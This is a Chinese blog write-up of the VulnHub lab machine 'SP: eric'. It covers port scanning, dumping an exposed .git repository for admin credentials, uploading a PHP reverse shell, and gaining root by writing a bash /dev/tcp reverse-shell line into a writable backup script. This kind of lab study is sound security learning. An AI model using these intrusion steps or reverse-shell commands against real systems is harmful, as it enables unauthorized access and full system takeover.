SP: eric

于 2024-08-27 18:14:24 发布
阅读量95 收藏 2
点赞数 2
分类专栏: VulnHub 文章标签: 网络安全 安全 linux 笔记 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aukum/article/details/141603242
版权

靶机搭建

靶机下载地址

在Virtualbox中打开下载好的靶机,网络配置修改为桥接模式,启动靶机即可。

信息收集

主机发现

nmap 192.168.31.0/24 -Pn -T4

靶机IP:192.168.31.244

端口扫描

nmap 192.168.31.244 -A -p- -T4

根据端口扫描结果可知开放了22,80端口,并且80端口的http服务直接暴露了/.git/(Git是一个被用于协同开发和代码刮玻璃的开源分布式和版本控制系统),可以考虑git信息泄露。

web站点信息收集

访问80端口。

直接访问/.git提示forbidden。目录扫描看看有没有其他信息。

dirsearch -u http://192.168.31.244

看到/.git下还有很多目录文件,一些能访问,大概率就是git信息泄露。根据文件内容猜测用户名是admin。 

访问/admin.php,一个登录页面。用户名admin,密码尝试sql万能密码失败并提示不需要暴力破解。

渗透

git信息泄露漏洞

git泄露漏洞产生原因:由于开发人员用git进行版本控制,对站点自动部署,如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。

使用githack下载Git存储库获取包含未加密密码。

python2 GitHack.py http://192.168.31.244/.git

到提示的文件夹看Git数据库。在admin.php中发现用户名和密码,admin:st@mpch0rdt.ightiRu$glo0mappL3

访问admin.php成功登录后是文件上传功能点。

利用文件上传getshell

上传反弹shell,用kali自带的php-reverse-shell.php(/usr/share/webshells/php),记得要修改ip和port。

前面目录扫描得到一个路径/upload,猜测文件上传的保存路径是/upload。nc开启监听,访问/upload/php-reverse-shell.php。

# 获得交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

get flag.txt!

提权

eric家目录下不仅有flag.txt,还有backup.sh,可读可写可执行。

在backup.sh中写入反弹shell即可拿到root权限。

# 向backup.sh写入反弹shell
echo 'bash -i >& /dev/tcp/攻击机ip/5555 0>&1' > backup.sh
# 运行backup.sh
./backup.sh
# 攻击机监听端口
nc -lvp 5555

拿到root shell。

get flag.txt!🎆

Aukum
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SP:eric 靶场复现【附代码】(权限提升)
weixin_52487093的博客
08-14 473
SP:eric 靶场复现【附代码】(权限提升)
vulnhub sp eric
mrwangtw的博客
02-09 569
扫描主机和端口 靶机IP:10.0.2.47 开放端口22和80 kali IP:10.0.2.4 这里一开始是看看能不能用匿名方式登录ssh,发现不可行 进入80端口 查看源代码,也没发现什么可用的信息,gobuster扫描 进入index,发现就是第一张图的内容 进入admin,也没发现什么可用的信息 使用drib再次扫描80端口 dirb http://10.0.2.47 发现有个.git的目录,使用githack下载源代码 python2 GitHack..
vulnhub系列:sp eric
jq_j37的博客
08-11 435
vulnhub系列:sp eric靶机,打靶文章
SP eric靶机通关攻略
systemino的博客
04-30 834
大家好,今天给大家带来的靶机是SP eric,这个靶机有两个flag,我们的目标就是把它们都找出来,flag的位置已经提供,如下: ·/root/flag.txt ·/root/eric/flag.txt 靶机下载地址:https://www.vulnhub.com/entry/sp-eric,274/ 渗透方法 ·网络扫描 ·访问HTTP服务端口 ·使用dirb遍历目录 ...
sp-eric靶机
m0_65285254的博客
08-14 297
访问 /upload/php-reverse-shell.php。存在文件上传功能,kali生成反弹shell。扫描目录发现了.git文件,存在源码泄漏。靶机ip地址为192.168.7.46。/etc/crontab 存在计划任务。在 /home/eric 下发现文件。将ip改为kali的ip 设置端口。在 /root 下发现flag文件。测试sql注入,弱口令等,无结果。拼接访问 /admin.php。可以写入反弹shell语句。将其下载到kali上读取。获得交互式shell。
sp eric靶机
zdd1453691081的博客
08-12 327
(1)ip扫描
Vulnhub之CP:eric渗透实战
weixin_43862283的博客
04-19 476
Vulnhub之CP:eric渗透实战 一、环境搭建 目标: a、/root/flag.txt b、/home/eric/flag.txt 难度:初学者 下载链接:https://isz.no/vm/eric.7z 我是用的VirtualBox进行测试的哦! 攻击机:kali linux 2019 IP地址为192.168.34.179 二、渗透实战过程 1、靶机发现、目录爆破 发...
cs4550-sp-20-park-eric服务器节点
02-20
【标题】"cs4550-sp-20-park-eric服务器节点"指的是一个针对课程cs4550(可能是一个大学课程编号)春季2020学期的项目,该项目由Park Eric负责,主要关注的是服务器节点的构建和管理。在IT领域,服务器节点通常是指...
pro-sp-2013-branding-responsive-web-dev:Oscar Medina,Kanwal Khipple,Rita Zhang,Eric Overfield,Chris Beckett和Benjamin Niaulin的“ Pro SharePoint 2013品牌和响应式Web开发”的源代码-Responsive source code
03-25
该存储库随附Oscar Medina,Kanwal Khipple,Rita Zhang,Eric Overfield,Chris Beckett和Benjamin Niaulin的(Apress,2013年)。 使用绿色按钮将文件下载为zip格式,或使用Git将存储库克隆到您的计算机上。 发行...
schmid滤波函数matlab源码-HiC_tools:HiC_tools
05-19
H.Huntley,Eric S.Lander和Erez Lieberman Aiden。 “。” 细胞系统3号。 1(2016年7月) Rao,Suhas SP,Miriam H.Huntley,Neva C.Durand,Elena K.Stamenova,Ivan D.Bochkov,James T.Robinson,Adrian L....
schmid滤波函数matlab源码-Hic_tools_collection:Hic_tools_collection
05-19
H.Huntley,Eric S.Lander和Erez Lieberman Aiden。 “ Juicer提供了一键式系统来分析回路分辨率Hi-C实验。” 细胞系统3号。 1(2016年7月):95-98。 。 Rao,Suhas SP,Miriam H.Huntley,Neva C.Durand,Elena K....
Awesome R:资源汇总
学-> 思->用
06-17 2607
Awesome R Awesome R 2020 2019 2018 Integrated Development Environments Syntax Data Manipulation Graphic Displays Html Widgets Reproducible Research Web Technologies and Services Parallel Computing High Performance Language API Database Management Machine
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8421
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 553
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。关键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
网络安全网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
最新发布
一定要站在自己热爱的生活里闪闪发光
08-27 147
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
需方软件供应链安全保障要求及开源场景对照自评表(上)
LJQClqjc的博客
08-27 87
开源软件供应链作为软件供应链的一种特殊形式,该国标亦适用于指导开源软件供应链中的供需双方开展组织管理和供应活动管理,增强开源软件供应链组织管理和供应活动管理能力,防范供应链导致的开源软件产品及其生命周期中断类的供应关系风险,防止供应活动在开源软件及其生命周期服务中引入新的技术安全风险和知识产权风险(例如:防止供应活动引入的软件漏洞、后门、篡改、伪造、许可协议不合规等),保障业务持续稳定安全运行。以下根据我们的分析研究,对国标中与开源供应链安全直接相关的内容进行识别与分析,供业内参考。
等保测评中的安全测试方法
w13359990065的博客
08-26 586
通过物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评等多层次的综合评估,可以有效识别系统中的安全隐患,提升信息系统的整体安全防护能力,满足国家相关法律法规的要求,助力企业提升行业竞争力。在等保测评中,安全测试方法的有效实施离不开专业的测评团队和科学的测评流程。测评团队需具备丰富的安全测试经验和专业知识,能够准确识别系统中的安全风险并提出切实可行的整改建议。首先,等保测评中的安全测试方法涵盖了多个层面,包括但不限于物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评。
ChaCha20:高效且安全的流密码算法
jiamisoft的博客
08-23 505
ChaCha20作为一种现代流密码算法,以其高速性能和良好的安全性,在信息安全领域占据了一席之地。随着技术的发展,ChaCha20将继续在保护数据安全方面发挥重要作用。同时,随着量子计算技术的进步,我们也需要关注ChaCha20等现有加密算法在量子时代的安全性,并积极探索新的加密技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值